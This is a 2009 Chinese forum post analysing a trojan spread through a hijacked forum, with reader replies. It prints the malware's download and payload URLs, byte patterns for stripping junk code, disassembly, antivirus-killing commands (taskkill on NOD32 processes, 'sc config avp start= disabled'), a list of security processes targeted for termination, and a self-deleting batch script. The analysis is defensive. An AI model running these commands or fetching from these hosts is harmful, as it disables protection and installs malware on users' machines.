首页
社区
课程
招聘
[原创]某论坛的挂马简单分析
发表于: 2009-4-28 02:53 11101

[原创]某论坛的挂马简单分析

2009-4-28 02:53
11101

晚上听群里说FF被挂马了 试着分析一下:
下载:h**p://w11.4g2s.com/1/eX.exe

UPS壳 脱壳后用DUP做个搜索替换补丁 去下花:

第一组:
60 B8 00 09 00 00 E9 01 00 00 00 E8 B8 77 07 00 00 BB 88 08 00 00 83 C3 25 83 C0 29 83 E8 14 83
EB 14 33 C9 90 83 E8 22 83 E8 21 90 83 E8 04 90 83 C3 0E 90 83 C0 56 90 83 E8 42 90 83 C3 25 83
C0 29 83 C3 25 83 C0 29 83 C3 25 83 C0 29 83 E8 22 33 C0 52 5A 90 53 5B B8 11 06 00 00 90 83 C0
16 90 83 E8 05 83 E8 32 90 33 C0 83 C0 36 83 E8 31 83 C3 32 83 EB 31 90 83 C0 36 83 E8 31 83 C3
32 83 EB 31 90 33 C0 83 C3 0F 83 C0 13 83 E8 10 83 E8 05 83 E8 10 83 C3 0F 83 C0 13 83 E8 04 83
C0 66 83 F8 00 0F 84 E2 FF FF FF 61

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90

第二组:
60 74 0D 75 0B E8 ?? ?? ?? ?? E3 E4 E5 ?? E7 ?? 61
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90

主程序简单看下 由于有大量的垃圾指令 而且主程序主要是释放文件的 没啥意思 所以简单说下他做干了点啥吧

1. 先检查是否有窗体上弹出(ASCII "TTe.er.eabcds.ss")这个字符串,如果有就是发现被报毒了 就退出了
2. 干掉NOD
004010D8=dumped_.004010D8 (ASCII "cmd.exe /c taskkill.exe /im ")
00401160=dumped_.00401160 (ASCII "ekrn.exe")
00401150=dumped_.00401150 (ASCII "egui.exe")

这样能干掉NOD???
taskkill.exe /im ekrn.exe
taskkill.exe /im egui.exe
ekrn.exe被卡掉后  services 会马上去创建该进程

3. 创建killdll.dll 运行后并删除(剿灭黑名单)
4. 根据开机时间生成一个EXE文件
00402743    FF15 5C104000       CALL DWORD PTR DS:[<&kernel32.GetTickCount>]        ; kernel32.GetTickCount
00402749    50                  PUSH EAX
0040274A    8D8D 94F5FFFF       LEA ECX,DWORD PTR SS:[EBP-A6C]
00402750    51                  PUSH ECX
00402751    68 44124000         PUSH dumped_.00401244                               ; ASCII "%s%d_xeex.exe"
00402756    8D95 94F5FFFF       LEA EDX,DWORD PTR SS:[EBP-A6C]
0040275C    52                  PUSH EDX
0040275D    FF15 A8104000       CALL DWORD PTR DS:[<&user32.wsprintfA>]             ; USER32.wsprintfA

==>  我的是 16427328_xeex.exe(下载一些东东)
5. 创建驱动 pcidump.sys  并安装该驱动
6. 创建_uok.bat    // 创建运行并删除历史痕迹

:Repeat
del "C:\dumped_.exe"
if exist "C:\dumped_.exe" goto Repeat
rmdir C:
del "H:\temp\S-1-5-~1\temp\_uok.bat"

====================================================

IDA 简单看了一下16427328_xeex.exe 和  killdll.dll

EAX=0012F44C, (ASCII "http://wxg.3ehs.com/01/fz.txt")

前者下载一堆这个东西:

1:http://u9.ed3t.com/sb/01/ok.exe
1:http://u1.ed3t.com/la/L1.exe
1:http://u1.ed3t.com/la/L3.exe
……
1:http://u9.ed3t.com/cj/a8.exe
1:http://u9.ed3t.com/cj/csj.exe
1:http://u9.ed3t.com/cj/sb.exe

DLL文件 干掉黑名单的进程

.text:10005115                 mov     dword ptr [ebp-110h], offset aAvp ; "avp"
.text:1000511F                 mov     dword ptr [ebp-10Ch], offset aSafeboxtray ; "safeboxTray"
.text:10005129                 mov     dword ptr [ebp-108h], offset a360safebox ; "360Safebox"
……
.text:10005341                 mov     dword ptr [ebp-10h], offset aRegguide ; "RegGuide"
.text:10005348                 mov     dword ptr [ebp-0Ch], offset aMpsvc2 ; "MPSVC2"
.text:1000534F                 mov     dword ptr [ebp-8], offset aMpmon ; "MPMon"

cmd /c sc config avp start= disabled

对这些文件还没有深入去看 肯定要有对注册表的操作 太困了 睡醒了继续分析下

附件是脱壳后的文件以及病毒释放/生成的文件 不贴分析代码了 总是那几个函数 没啥意思

PS: 终于换回键盘来了 还是X构架的比较爽 O(∩_∩)O哈哈~

一款杀毒软件首先是要分析并拦截病毒 并且要在中毒的PC上剿灭病毒 但光这些是不够的 有一些一朋友的PC中毒了 然后安装了NOD 结果系统的dll都被感染了 若清理掉这些DLL 无疑系统将崩溃 若不清理 都已经感染 ……

杀软杀掉病毒不是目的 目的是为用户提供一个安全稳定的系统环境 所以我觉得杀软不仅要提供杀毒机制 还应该为用户提供一套恢复机制——修复被病毒感染的PC   所以分析病毒是第一步  提出杀灭病毒的方法的第二步  提供修复被感染系统为第三步


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

上传的附件:
收藏
免费 7
支持
分享
最新回复 (19)
雪    币: 107
活跃值: (1693)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
2
GOOD JOB 还有邪恶的驱动
2009-4-28 08:11
0
雪    币: 141
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
2009-4-28 12:33
0
雪    币: 220
活跃值: (721)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
lz说的应该是卡饭论坛吧,挂了好几天了!
"MPSVC2"
.text:1000534F                 mov     dword ptr [ebp-8], offset aMpmon ; "MPMon"

能干掉微点?
2009-4-28 13:06
0
雪    币: 189
活跃值: (56)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
5
打算干掉杀毒软件的病毒,不是好病毒
2009-4-28 20:59
0
雪    币: 443
活跃值: (200)
能力值: ( LV9,RANK:1140 )
在线值:
发帖
回帖
粉丝
6
[QUOTE=dayang;613214]lz说的应该是卡饭论坛吧,挂了好几天了!
"MPSVC2"
.text:1000534F                 mov     dword ptr [ebp-8], offset aMpmon ; "MPMon"

能干掉微点?[/QUOTE]

卡飯與霏凡被掛,只相隔一天而已。。。
2009-4-29 00:47
0
雪    币: 546
活跃值: (1672)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
7
唉,现在叫个病毒的,都搞驱动。看来驱动编程不得不学了。
2009-4-29 01:01
0
雪    币: 605
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
cfz
8
在危险了现在,,进来学习了,谢谢分享
2009-4-29 07:17
0
雪    币: 233
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
羡慕LZ的能力. 俺只能看看了.
2009-4-29 10:57
0
雪    币: 234
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
不知道挂马用的是什么漏洞
2009-4-29 11:38
0
雪    币: 205
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
太强了,学习
2009-4-29 15:09
0
雪    币: 709
活跃值: (2420)
能力值: ( LV12,RANK:1010 )
在线值:
发帖
回帖
粉丝
12
210Kx
2009-4-29 15:20
0
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
精辟 我只是一个初学者 慢慢看
2009-4-29 15:42
0
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
偶在理解,坚持学习
2009-4-29 16:19
0
雪    币: 203
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
还是200KX呀
2009-4-29 16:35
0
雪    币: 1407
活跃值: (17)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
学习一下 对dll文件还分析不清
2009-4-30 11:49
0
雪    币: 4448
活跃值: (3671)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
17
都是流量 肉鸡 惹的祸
2009-4-30 18:04
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
LZ:pyg?
嘿嘿
2009-5-3 00:30
0
雪    币: 5
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
的确呀,我也考虑学习驱动中。
2009-5-3 18:22
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
20
我学习,谢谢诶、
2009-5-4 15:31
0
游客
登录 | 注册 方可回帖
返回
//